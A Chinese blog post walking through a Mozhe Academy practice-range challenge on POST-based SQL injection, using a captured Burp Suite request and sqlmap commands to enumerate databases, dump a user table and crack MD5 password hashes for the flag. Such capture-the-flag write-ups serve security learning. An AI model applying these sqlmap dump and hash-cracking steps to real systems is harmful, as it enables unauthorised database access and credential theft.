墨者学院-SQL注入漏洞测试(POST)

已于 2024-07-22 19:52:49 修改
阅读量169 收藏
点赞数 1
分类专栏: 墨者靶场 文章标签: sql 数据库
于 2024-07-22 18:34:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66105152/article/details/140616913
版权

地址:http://124.70.71.251:47354/

1.先用burpsuit抓包

保存为12.txt

2.用 sqlmap查所有数据库
-r D:\xinan\12.txt --dbs --batch

3.查当前数据库,得到当前数据库为mozhe_Discuz_StormGroup
-r D:\xinan\12.txt --current-db --batch

4.获取当前数据库的表
-r D:\xinan\12.txt -D mozhe_Discuz_StormGroup --tables --batch

5.查询表中的数据
-r D:\xinan\12.txt -D mozhe_Discuz_StormGroup --tables --columns --batch

6.明显name和password可疑,查第一个表中的数据
-r D:\xinan\12.txt -D mozhe_Discuz_StormGroup --tables --columns --batch --dump

7.解密

发现密码是一串MD5,去MD5解码网站https://www.cmd5.com/?lailu=www.itdka.cn

        两个都解码去试

成功得到key

╰落叶梧桐细数悲伤゛
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院SQL注入漏洞测试(POST)
weixin_57240513的博客
07-22 423
WEB业务系统中,POST方式提交数据很常见,如登录框、留言评论等可能都会用到,这种与GET方式其实差。
墨者学院-SQL注入漏洞测试(POST)解析
l_OMl_l的博客
07-22 187
正常流程应该是查到回显点后,在其位置查所在数据库,数据表,列名以获取账号密码登录后获取 key ,但这里不知道为什么直接登录到了后台,直接获取了key。注:此处不可使用 --+ 闭合, + 会被识别为空格,由于账号栏后方为空,空格会被省略,使用 # 即可。order by 3 未报错,order by 4 报错,证明有三列数据。在name之后加单引号引起报错,则name可作为注入点。
墨者学院】“SQL注入漏洞测试(POST)”详细通关
m0_54407057的博客
07-22 169
墨者学院SQL注入漏洞测试(POST) 通关教程,附思路代码
墨者学院-SQL注入漏洞测试(布尔盲注)
qq_47094508的博客
01-23 3116
手工测试和工具测试工具(sqlmap)工具使用参考连接https://www.anquanke.com/post/id/235846首先我们拿到题目之后会得到一个登录框这时候需要去寻找他的注入点,可以通过登陆键下方的提示进去,也可以使用工具一把梭这工具是真好用(火狐小插件) 当我们来到这个注入点的页面就可以用工具一把梭 首先爆他的库名 在爆表名 列名 抓内容 抓到之后md5解密,最终得到flag 手工测试首先判断注入点是否存在 盲注没有回显所以我们首先需要判断库名长度,通过测试最终
墨者学院 - SQL注入漏洞测试(POST)
多崎巡礼的博客
08-20 5366
此题和最开始拿到sql注入不一样,注入点不再是公告了,二是登陆页面的账号栏,简单的语句就能得到错误回显 根据题目提示,post请求 1)随便输入用户名和密码,然后使用 burp抓取登录界面的post包,保存为txt; 2)将txt放在sqlmap目录下; 3)打开sqlmap,使用post注入sqlmap.py -r 文件路径/文件名 --dbs  //证明可以注入,且获取所有数据库名...
墨者靶场】---1、SQL手工注入漏洞测试
qq_43168364的博客
08-21 274
实训目标 掌握SQL注入原理; 了解手工注入的方法; 了解MySQL的数据结构; 了解字符串的MD5加解密; sql注入的流程 1、判断注入点 2、判断注入类型,是字符型还是数字型 3、判断字段数 4、判断显示位 5、得库名 6、得表名 7、得列名 8、得数据 盲注和报错注入可能不太会用到上面的步骤,但是大致思想都是相同的。 注入步骤 起初以为是在登录窗口进行的POST注入,试了很多次没有成功,后来发现下面还有一个页面 在这里找到了它的注入点在URL中 接下来判断注入类型(这里and应该是被
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
2. **SQL注入示例**:当DB2存在SQL注入漏洞时,可以通过输入`4`来表示希望查询的列数为4。这通常意味着,如果攻击者能够成功构造SQL语句,就能从数据库中获取4列数据。 3. **列名猜测**:使用专门的SQL注入工具...
墨者学院_CMS系统漏洞分析溯源(第9题)
weixin_50698958的博客
09-23 619
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
漏洞披露-金慧-综合管理信息系统-SQL
最新发布
无问社区的博客
08-27 234
金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL统计行数的语句
曹昆的技术博客
08-27 105
SQL 中,你可以使用 COUNT() 函数来统计查询结果的行数。这个函数可以用在不同的上下文中,具体取决于你想要统计的内容。
SQL】关注者数量
Frost_Descent的博客
08-23 566
(user_id, follower_id) 是这个表的主键(具有唯一值的列的组合)。count计数,count(follower_id) followers_count。该表包含一个关注关系中关注者和用户的编号,其中关注者关注用户。使用order by升序排列order by user_id。编写解决方案,对于每一个用户,返回该用户的关注者数量。按照用户id分组,group by user_id。查询结果的格式如下示例所示。2 的关注者有 {0,1}0 的关注者有 {1}1 的关注者有 {0}
出现Property ‘sqlSessionFactory‘ or ‘sqlSessionTemplate‘ are requiredProperty报错
m0_74436895的博客
08-23 734
SpringBootApplication,它组合了@Configuration, @EnableAutoConfiguration, 和 @ComponentScan注解的功能。我在使用一个验证码生成的工具asy-captcha库的验证码接口遇到javax.script.ScriptEngine.eval调用失败的问题,因为engine为null。1.启动类 里配置的 (@MapperScan(“com.example.demo.dao.mapper”)),这里开始配置错了。n若有添加,尝试删除。
SQL进阶技巧:如何按任意时段分析时间区间问题? | 分区间讨论【左、中、右】
石榴姐yyds
08-23 139
本文分析了一种按任意时段计算时间区间问题的方法和思路,其本质是区间重叠问题的应用,文中给出了两种方法,一种按照区间重叠的方式进行分情况讨论划分区间,找出重叠区间,并计算问题,一种按照区间展开的形式形成全量的明细表,基于明细表求解任意给定的时段统计问题
基于SSM的在线家教管理系统的设计与实现 (含源码+sql+视频导入教程+论文+PPT)
coderWangbuer的博客
08-24 787
基于SSM的在线家教管理系统拥有三个角色 管理员:用户管理、教师管理、简历管理、申请管理、课程管理、招聘教师管理、应聘管理、评价管理等 教师:课程管理、应聘职位、简历管理等 用户:申请教师等
PostgreSQL 内核资源管理
分享关于Java编程、数据库管理和信息安全方面的最佳实践
08-23 1271
PostgreSQL 有时会耗尽各种操作系统资源限制,特别是在同一系统上运行多个服务器实例或在非常大的安装环境中。此部分解释了 PostgreSQL 使用的内核资源,以及解决与内核资源消耗相关问题的步骤。
【PGCCC】PostgreSQL 死锁揭秘:如何检测与解决死锁问题的详细指南
PGCCC的博客
08-23 1002
PostgreSQL 的死锁检测机制通过锁等待图的构建和环路检测,能够有效地识别和处理死锁问题。了解其工作原理和处理策略对于优化数据库性能和提高系统稳定性至关重要。在实际应用中,及时分析和处理死锁情况,并优化数据库操作,可以减少死锁的发生,从而提升数据库的整体效率。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值